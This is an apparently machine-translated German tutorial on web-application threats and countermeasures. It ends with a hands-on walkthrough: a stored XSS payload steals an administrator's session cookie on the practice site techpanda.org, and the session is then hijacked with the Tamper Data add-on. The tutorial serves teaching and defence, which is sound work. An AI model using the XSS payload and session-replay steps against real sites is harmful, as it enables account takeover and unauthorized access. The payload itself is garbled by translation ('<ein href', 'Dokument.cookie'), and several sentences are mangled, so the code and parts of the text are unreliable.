Mehr Menschen haben Zugang zum Internet als je zuvor. Dies hat viele Organisationen dazu veranlasst, webbasierte Anwendungen zu entwickeln, mit denen Benutzer online mit der Organisation interagieren können. Schlecht geschriebener Code für Webanwendungen kann ausgenutzt werden, um unbefugten Zugriff auf sensible Daten und Webserver zu erhalten.

In diesem Tutorial erfahren Sie, wie Sie Websites hacken, und wir stellen Ihnen Techniken zum Hacken von Webanwendungen und die Gegenmaßnahmen vor, die Sie zum Schutz vor solchen Angriffen ergreifen können.

In diesem Tutorial behandelte Themen

• Was ist eine Webanwendung? Was sind Webbedrohungen?
• Wie schützt man seine Website vor Hacks?
• Website-Hacking-Tricks: Hacken Sie eine Website online!

Was ist eine Webanwendung? Was sind Webbedrohungen?

Eine Webanwendung (auch bekannt als Website) ist eine Anwendung, die auf dem Client-Server-Modell basiert. Der Server stellt den Datenbankzugriff und die Geschäftslogik bereit. Es wird auf einem Webserver gehostet. Die Clientanwendung wird im Webbrowser des Clients ausgeführt. Webanwendungen werden normalerweise in Sprachen wie Java, C # und VB.Net , PHP, ColdFusion Markup Language usw. die in Webanwendungen verwendeten Datenbank-Engines umfassen MySQL, MS SQL Server, PostgreSQL, SQLite usw.

Die meisten Webanwendungen werden auf öffentlichen Servern gehostet, die über das Internet zugänglich sind. Dies macht sie aufgrund der einfachen Zugänglichkeit anfällig für Angriffe. Im Folgenden finden Sie allgemeine Bedrohungen für Webanwendungen.

• SQL Injection – Das Ziel dieser Bedrohung könnte darin bestehen, Anmeldealgorithmen zu umgehen, die Daten zu sabotieren usw.
• Denial-of-Service-Angriffe – Ziel dieser Bedrohung könnte es sein, legitimen Benutzern den Zugriff auf die Ressource zu verweigern
• Cross Site Scripting XSS– Ziel dieser Bedrohung könnte es sein, Code einzufügen, der auf der Clientseite ausgeführt werden kann Browser.
• Cookie/ Session Poisoning – Das Ziel dieser Bedrohung besteht darin, Cookies / Sitzungsdaten durch einen Angreifer zu ändern, um unbefugten Zugriff zu erhalten.
• Formularmanipulation – Ziel dieser Bedrohung ist es, Formulardaten wie Preise in E-Commerce-Anwendungen so zu ändern, dass der Angreifer Artikel zu reduzierten Preisen erhalten kann.
• Code Injection – Das Ziel dieser Bedrohung ist es, Code wie PHP, Python usw. einzuschleusen. das kann auf dem Server ausgeführt werden. Der Code kann Hintertüren installieren, sensible Informationen preisgeben usw.
• Verunstaltung – Das Ziel dieser Bedrohung besteht darin, die auf einer Website angezeigte Seite zu ändern und alle Seitenanforderungen auf eine einzelne Seite umzuleiten, die die Nachricht des Angreifers enthält.

Wie schützt man seine Website vor Hacks?

Eine Organisation kann die folgende Richtlinie anwenden, um sich vor Angriffen auf Webserver zu schützen.

• SQL Injection – Das Bereinigen und Validieren von Benutzerparametern, bevor sie zur Verarbeitung an die Datenbank gesendet werden, kann dazu beitragen, die Wahrscheinlichkeit eines Angriffs über SQL Injection zu verringern. Datenbank-Engines wie MS SQL Server, MySQL, etc. unterstützt Parameter und vorbereitete Anweisungen. Sie sind viel sicherer als herkömmliche SQL–Anweisungen
• Denial-of-Service-Angriffe – Firewalls können verwendet werden, um Datenverkehr von verdächtigen IP-Adressen zu löschen, wenn der Angriff ein einfaches DoS ist. Die richtige Konfiguration von Netzwerken und Intrusion Detection System kann auch dazu beitragen, die Chancen eines DoS-Angriff erfolgreich gewesen.
• Cross Site Scripting – Das Validieren und Bereinigen von Headern, über die URL übergebenen Parametern, Formularparametern und versteckten Werten kann dazu beitragen, XSS-Angriffe zu reduzieren.
• Cookie– /Sitzungsvergiftung – Dies kann verhindert werden, indem der Inhalt der Cookies verschlüsselt, die Cookies nach einiger Zeit zeitlich begrenzt werden und die Cookies mit der Client-IP-Adresse verknüpft werden, mit der sie erstellt wurden.
• Tempern von Formularen – Dies kann verhindert werden, indem die Benutzereingabe vor der Verarbeitung validiert und verifiziert wird.
• Code Injection – Dies kann verhindert werden, indem alle Parameter als Daten und nicht als ausführbarer Code behandelt werden. Bereinigung und Validierung können verwendet werden, um dies zu implementieren.
• Defacement – Eine gute Sicherheitsrichtlinie für die Entwicklung von Webanwendungen sollte sicherstellen, dass die häufig verwendeten Sicherheitsanfälligkeiten für den Zugriff auf den Webserver versiegelt werden. Dies kann eine ordnungsgemäße Konfiguration des Betriebssystems, der Webserversoftware und der besten Sicherheitspraktiken bei der Entwicklung von Webanwendungen sein.

Website-Hacking-Tricks: Hacken Sie eine Website online

In diesem praktischen Szenario zum Hacken von Websites werden wir die Benutzersitzung der Webanwendung unter www.techpanda.org. Wir verwenden Cross Site Scripting, um die Cookie-Sitzungs-ID zu lesen und sie dann zu verwenden, um eine legitime Benutzersitzung zu imitieren.

Es wird angenommen, dass der Angreifer Zugriff auf die Webanwendung hat und die Sitzungen anderer Benutzer, die dieselbe Anwendung verwenden, entführen möchte. Das Ziel dieses Angriffs könnte darin bestehen, Administratorzugriff auf die Webanwendung zu erhalten, vorausgesetzt, das Zugriffskonto des Angreifers ist begrenzt.

Erste Schritte

• Öffnen http://www.techpanda.org/
• Zu Übungszwecken wird dringend empfohlen, den Zugriff über SQL Injection zu erhalten. Weitere Informationen dazu finden Sie in diesem Artikel.
• Die Login-E-Mail lautet Diese E-Mail-Adresse ist gegen Spambots geschützt. Sie müssen JavaScript aktivieren, damit Sie es sehen können., das Passwort ist Password2010
• Wenn Sie sich erfolgreich angemeldet haben, erhalten Sie Folgendes Dashboard

• Klicken Sie auf Neuen Kontakt hinzufügen
• Geben Sie Folgendes als Vornamen ein

<ein href=# onclick=\“Dokument.location=\’http://techpanda.org/snatch_sess_id.php?c=\’+escape\(Dokument.cookie\)\;\“>Dark</a>

HIER

Der obige Code verwendet JavaScript. Es fügt einen Hyperlink mit einem Onclick-Ereignis hinzu. Wenn der ahnungslose Benutzer auf den Link klickt, ruft das Ereignis die PHP-Cookie-Sitzungs-ID ab und sendet sie an die snatch_sess_id.php-Seite zusammen mit der Sitzungs-ID in der URL

• Geben Sie die verbleibenden Details wie unten gezeigt ein
• Klicken Sie auf Änderungen speichern

So hacken Sie eine Website

• Ihr Dashboard sieht jetzt wie der folgende Bildschirm aus

• Da site-Skript-Code wird in der Datenbank gespeichert, es wird jedes Mal geladen, wenn die benutzer mit Zugriffsrechten melden sich an
• Angenommen, der Administrator meldet sich an und klickt auf den Hyperlink Dark
• Er/sie erhält das Fenster mit der Sitzungs-ID, die in der URL angezeigt wird

Hinweis: Das Skript könnte den Wert an einen Remote-Server senden, auf PHPSESSID wird gespeichert, dann wird der Benutzer zurück zur Website weitergeleitet, als wäre nichts passiert.

Hinweis: der Wert, den Sie erhalten, kann sich von dem in diesem Tutorial zum Hacken von Webseiten unterscheiden, aber das Konzept ist das gleiche

Session Impersonation using Firefox and Tamper Data add-on

Das folgende Flussdiagramm zeigt die Schritte, die Sie ausführen müssen, um diese Übung abzuschließen.

• Für diesen Abschnitt benötigen Sie den Firefox-Webbrowser und das Manipulationsdaten-Add-on
• Öffnen Sie Firefox und installieren Sie das Add-in wie in den folgenden Diagrammen gezeigt

• Suchen Sie nach Manipulationsdaten und klicken Sie dann wie oben gezeigt auf installieren

• Klicken auf Akzeptieren und installieren…

• Klicken
• Aktivieren Sie die Menüleiste in Firefox, wenn sie nicht angezeigt wird

• Klicken Sie auf das Menü Extras und wählen Sie dann Manipulationsdaten wie unten gezeigt

• Sie erhalten das folgende Fenster. Hinweis: Wenn das Fenster nicht leer ist, drücken Sie die Clear-Taste

• Klicken Sie auf Start Tamper menu
• Wechseln Sie zurück zum Firefox-Webbrowser und geben Sie http://www.techpanda.org/Dashboard ein.php Drücken Sie dann die Eingabetaste, um die Seite zu laden
• Sie erhalten das folgende Popup von Tamper Data

• Das Popup-Fenster hat drei (3) Optionen. Mit der Option Tamper können Sie die HTTP-Header-Informationen ändern, bevor sie an den Server gesendet werden.
• Klicken Sie darauf
• Sie erhalten das folgende Fenster

• Kopieren Sie die PHP-Sitzungs-ID, die Sie von der Angriffs-URL kopiert haben, und fügen Sie sie nach dem Gleichheitszeichen ein. Ihr Wert sollte nun folgendermaßen aussehen

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• Klicken Sie auf die Schaltfläche OK
• Sie erhalten erneut das Manipulationsdaten-Popup-Fenster

• Deaktivieren Sie das Kontrollkästchen, in dem Sie aufgefordert werden, die Manipulation fortzusetzen?
• Klicken Sie auf die Schaltfläche Senden, wenn Sie fertig sind
• Sie sollten das Dashboard wie unten gezeigt sehen können

Hinweis: wir haben uns nicht angemeldet, wir haben uns als Anmeldesitzung mit dem PHPSESSID-Wert ausgegeben, den wir mithilfe von Cross Site Scripting abgerufen haben

Zusammenfassung

• Eine Webanwendung basiert auf dem Server-Client-Modell. Die Clientseite verwendet den Webbrowser, um auf die Ressourcen auf dem Server zuzugreifen.
• Webanwendungen sind in der Regel über das Internet zugänglich. Dies macht sie anfällig für Angriffe.Zu den Bedrohungen für Webanwendungen gehören SQL-Injection, Code-Injection, XSS, Defacement, Cookie-Poisoning usw.
• Eine gute Sicherheitsrichtlinie bei der Entwicklung von Webanwendungen kann helfen, sie sicher zu machen.